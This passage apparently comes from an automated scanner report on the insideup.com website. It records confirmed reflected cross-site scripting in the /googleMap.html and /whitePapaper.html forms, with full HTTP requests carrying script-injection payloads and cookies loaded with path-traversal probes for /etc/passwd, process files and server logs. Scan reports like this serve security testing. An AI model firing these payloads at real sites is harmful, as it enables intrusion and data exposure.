<link rel="stylesheet" type="text/css" href="/css/calendar.css" /> <script type="text/javascript" src="/js/jquery-1.2.1.js"></script> <script type="text/javascript" src="/js/ajax.js"></script> <script type="text/javascript" src="/js/ajax-dynamic-list.js"></script> <script type="text/javascript" src="/js/default.js"></script> <script type="text/javascript" src="/js/calendar.js" ></script> <script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E")); </script> <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {} </script></head><body> <div id="mainContainer">
<!--Header Start's Here--> <div class="header"> <!---put header section here--> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option value="Seattle" >Seattle</option> <option value="St. Louis" >St. Louis</option> <option value="Tampa" >Tampa</option> <option value="Tucson" >Tucson</option> <option value="Tulsa" >Tulsa</option> <option value="Washington D.C." >Washington D.C.</option> </select> </div> </div> </div> <div> <div id="loginAndMemberContainer"> <form id="loginForm" method="post"> <input type="hidden" name="refererUrl" value=""> <div style="width:320px;height:55px;float:left;padding:10px 0 0 5px;"> <div> <div style="float:left;padding:0px 0 0 10px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="username" type="text" value="username" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="1"/> </div> <div style="float:left;padding:0px 0 0 8px;"> <input style="border:1px solid #CCCCCC;height:20px;width:107px;padding:3px 0 0 3px;" name="password" type="password" value="password" onfocus="clearInput(this);" onkeypress="checkEnterKey(event)" tabindex="2" /> </div> <div style="float:left;padding:0px 0 0 8px;"> <a href="javascript:void(0);" onclick="javascript:submitLogin();checkScreenWidth();" onkeypress="checkEnterKey(event)"><img src="/images/loginBtn.gif" border="0" onkeypress="checkEnterKey(event)" tabindex="4" alt="Login"/></a> </div> </div> <div style="float:left; padding:2px 0 0 0;"> <input type="hidden" name="_rememberme"> <div style="float:left;padding:0px 0 0 10px;"><input tabindex="3" type="checkbox" name="rememberme" value="true" /></div> <div style="float:left;padding:3px 0 0 2px;color:#777777;font-size:10px;font-weight:bold;">Remember Me</div> <div style="float:left;padding:3px 0 0 20px;color:#777777;font-size:10px; font-weight:bold;"> <a href="#" class="greyBs" onClick="showForgotPassword();">Password Reminder</a> </div> <div style="padding: 3px 0pt 0pt 10px; float: left;"><a href="/communitysignup.html" style="color:#777777; font-size: 10px; font-weight: bold;" class="greyBs">Register Now</a></div> </div> </div> </form> </div> <div style="float:left;padding:17px 0 0 0; width:110px;color:black;font-size:11px" id="blkShare"> <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#tabs=web%2Cpost%2Cemail&amp;charset=utf-8&amp;style=default&amp;publisher=c17cda91-72c8-497c-bea7-a4d4698b5bb5&offsetLeft=-349"></script> </div> <img style="display:none;" src="/images/spacer.gif" onload="trackingPageContent('ContactUs',0,'')" alt="Contact Us" /> </div> </div> <div class="clear"></div> <div class="punchLine">Where Business Services Buyers & Sellers Connect</div> <div class="float-left" style="width:550px;"> <ul id="headerNav" class="headerNav headerContactusActive"> <li class="headerHome"><a href="/index.html" onMouseOver="toggleHeader(0, 'headerHomeActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Home</a></li> <li class="headerAdvertise"><a href="/advertise.html" onMouseOver="toggleHeader(0, 'headerAdvertiseActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Advertise</a></li> <li class="headerPartner"><a href="/partner.html" onMouseOver="toggleHeader(0, 'headerPartnerActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Partner</a></li> <li class="headerAboutus"><a href="/aboutUs.html" onMouseOver="toggleHeader(0, 'headerAboutusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">About Us</a></li> <li class="headerResources"><a href="/communitymainpage.html" onMouseOver="toggleHeader(0, 'headerResourcesActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Resources</a></li> <li class="headerContactus"><a href="/contactUs.html" onMouseOver="toggleHeader(0, 'headerContactusActive')" onMouseOut="toggleHeader(1, 'headerContactusActive')">Contact us</a></li> </ul> </div> <div class="clear"></div> </div> <div style="clear:both;"></div> <div id="forgotPasswordPopUpLayerBody" style="*left:15%;*top:18%;"></div> </div> <!--Header End's Here--> <!--Mid Container Start's Here--> <div id="midSectionBox"> <!--midsection part starts--> <script>
var RecaptchaOptions = {
theme :'custom',
lang :'en',
custom_theme_widget :'recaptcha_widget'
};
</script><div style="background:#eeeeee;"> <table width="902" border="0" align="center" cellpadding="0" cellspacing="0" style="background:url(images/ContectBgImg.png) repeat-y top;"> <tr> <td width="596"> <form method="post" action="contactUs.html"> <input type="hidden" id="value" name="value" value="3" /> <input type="hidden" id="subCategoryId" name="subCategoryId" value="-1" /> <table width="568" border="0" align="right" cellpadding="0" cellspacing="0">
<tr> <td height="84" colspan="2" style="font:bold 24px Arial, Helvetica, sans-serif; color:#2564c7;">Contact Us</td> </tr> <tr> <td colspan="2" style="border-top:1px solid #eaeaea; border-bottom:1px solid #eaeaea;"> <table width="539" border="0" align="left" cellspacing="0" style="font:normal 12px Arial, Helvetica, sans-serif; color:#212121; margin:10px 0 15px 0;"> <tr> <td width="257" height="40" align="right">First Name&nbsp;&nbsp; <input type="text" value="Smith" name="firstName" id="firstName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td width="278" align="right">Last Name&nbsp;&nbsp; <input type="text" value="Smith" name="lastName" id="lastName" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> </tr> <tr> <td height="40" align="right">Email&nbsp;&nbsp; <input type="text" value="netsparker@example.com" name="email" id="email" style="width:160px; border:1px groove #c3c3c3;" class=" " /> </td> <td align="right">Phone&nbsp;&nbsp; <input type="text" value="3" name="phone" id="phone" style="width:160px; border:1px groove #c3c3c3;" class="formError" /> </td> </tr> <tr> <td height="40" align="right">Company&nbsp;&nbsp; <input type="text" value="3" name="company" id="company" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> <td align="right"> Your Interest&nbsp;&nbsp; <select value="'"--></style></script><script>netsparker(0x000D3E)</script>" name="yourInterest" id="yourInterest" style="width:160px; border:1px groove #c3c3c3;"> <option>Media Relations</option> <option>Buy Leads</option> <option>Customer Service</option> <option>Investor Relations</option> <option>Partner</option> </select> </td> </tr> <tr> <td align="right">Lead Category&nbsp;&nbsp; <select name="leadCategory" id="leadCategory" class='' style="width:160px;"> <option selected="selected" value="3"></option> </select> </td> <td height="40" align="right">Company URL&nbsp;&nbsp; <input type="text" value="3" name="url" id="url" style="width:160px; border:1px groove #c3c3c3;" class=""/> </td> </tr> </table> </td> </tr> <tr> <td width="95" height="115" align="right" valign="top" style="padding:25px 0 0 0; font:normal 12px Arial, Helvetica, sans-serif; padding-right:2px;">Comments&nbsp;&nbsp; </td> <td wid..
- /googleMap.html

/googleMap.html CONFIRMED

http://www.insideup.com/googleMap.html?address='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0..

Parameters

Parameter Type Value
address GET '"--></style></script><script>alert(0x000EA5)</script>

Request

GET /googleMap.html?address='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000EA5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/js/default.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:37:04 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=2568F74C18693C5BE273D2B34ED9751C; Path=/
Content-Language: en-US
Content-Length: 1218
Connection: close
Content-Type: text/html;charset=ISO-8859-1


<script type="text/javascript"> var map = null; var geocoder = null; function initialize() { if (GBrowserIsCompatible()) { map = new GMap2(document.getElementById("map_canvas")); map.setCenter(new GLatLng(37.4419, -122.1419), 13); geocoder = new GClientGeocoder(); } } function showAddress() { var address=''"--></style></script><script>netsparker(0x000EA5)</script>'; if (geocoder) { geocoder.getLatLng( address, function(point) { if (!point) { //alert(address + " not found"); } else { map.setCenter(point, 13); var marker = new GMarker(point); map.addOverlay(marker); //marker.openInfoWindowHtml(address); } } ); } } </script> <form name="googleform" id="googleform"></form> <div id="map_canvas" style="width: 275px; height: 200px"></div> <img src="/images/spacer.gif" onload="initialize()" onunload="GUnload()" width="0" height="0"/> <img src="/images/spacer.gif" onload="showAddress()" width="0" height="0"/>
- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST '"--></style></script><script>alert(0x001151)</script>
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
lastName POST Smith
parentPage POST 3
phone POST 3
src POST teledirectcasestudy
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/teledirectcasestudy.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Content-Length: 233
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

company='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001151)%3c%2fscript%3e&companyServices=3&email=netsparker%40example.com&firstName=Smith&lastName=Smith&parentPage=3&phone=3&src=teledirectcasestudy&Submit=3&url=3

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:39:02 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=1C9E54BAF0C132BF14DAEFA9D571B851; Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Language: en-US
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="keywords" content=""/> <meta name="description" content=""/> <meta name="robots" content="index; follow"/> <title></title> <link href="/css/reset.css" rel="stylesheet" type="text/css"><link href="/css/grid.css" rel="stylesheet" type="text/css"><link href="/css/newstyle.css" rel="stylesheet" type="text/css"><script type="text/javascript" src="/js/jquery-1.2.1.js"></script><script type="text/javascript" src="/js/ajax.js"></script><script type="text/javascript" src="/js/ajax-dynamic-list.js"></script><script type="text/javascript" src="/js/default.js"></script><script type="text/javascript"> var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www."); document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-5083151-1"); pageTracker._setDomainName(".insideup.com"); pageTracker._trackPageview(); } catch(err) {}</script></head><body><div class="container"> <div class="wrapper"> <div class="header"> <script language="javascript">function clearInput(e){if(e.value=='username'||e.value=='password'){e.value="";} }</script> <style>.c_767676, a.c_767676:link, a.c_767676:visited { color:#767676; text-decoration:none; font:bold 14px Arial;}a.c_767676:hover { color:#767676; text-decoration:underline; font:bold 14px Arial;}</style> <div class="h-container"> <div> <div class="float-left logo"><a href="/index.html"><img src="/images/logo.png" alt="InsideUp Logo" width="157" height="78"></a></div> <div style="float:left;padding:10px 0 0 10px;"> <div style="float:left;padding:7px 0px 0 0;font-size:11px;color:#777777;font-weight:bold;">Your City:</div> <div style="float:left;padding:0px 0 0 7px; width:123px;color:#2B70CD;font-weight:bold;font-size:9px;"> <div style="float:left;width:135px; padding:2px 10px 0 0;"> <select style="width:128px;color:#2B70CD;font-weight:bold;font-size:9px;" id="cityselectbox" name="cityselectbox" onchange="updateUserSessionCity();"> <option value="Albuquerque" >Albuquerque</option> <option value="Atlanta" >Atlanta</option> <option value="Austin" >Austin</option> <option value="Baltimore" >Baltimore</option> <option value="Boston" >Boston</option> <option value="Charlotte" >Charlotte</option> <option value="Chicago" >Chicago</option> <option value="Cincinnati" >Cincinnati</option> <option value="Cleveland" >Cleveland</option> <option value="Columbus" >Columbus</option> <option value="Dallas" selected=selected >Dallas</option> <option value="Denver" >Denver</option> <option value="Detroit" >Detroit</option> <option value="El Paso" >El Paso</option> <option value="Fort Worth" >Fort Worth</option> <option value="Fresno" >Fresno</option> <option value="Honolulu" >Honolulu</option> <option value="Houston" >Houston</option> <option value="Indianapolis" >Indianapolis</option> <option value="Jacksonville" >Jacksonville</option> <option value="Kansas City" >Kansas City</option> <option value="Las Vegas" >Las Vegas</option> <option value="Los Angeles" >Los Angeles</option> <option value="Memphis" >Memphis</option> <option value="Mesa" >Mesa</option> <option value="Miami" >Miami</option> <option value="Milwaukee" >Milwaukee</option> <option value="Minneapolis-St. Paul" >Minneapolis-St. Paul</option> <option value="Nashville" >Nashville</option> <option value="New Orleans" >New Orleans</option> <option value="New York" >New York</option> <option value="Newark" >Newark</option> <option value="Oakland" >Oakland</option> <option value="Orlando" >Orlando</option> <option value="Philadelphia" >Philadelphia</option> <option value="Phoenix" >Phoenix</option> <option value="Pittsburgh" >Pittsburgh</option> <option value="Portland" >Portland</option> <option value="Raleigh" >Raleigh</option> <option value="San Diego" >San Diego</option> <option value="Sacramento" >Sacramento</option> <option value="San Antonio" >San Antonio</option> <option value="San Francisco" >San Francisco</option> <option value="San Jose" >San Jose</option> <option 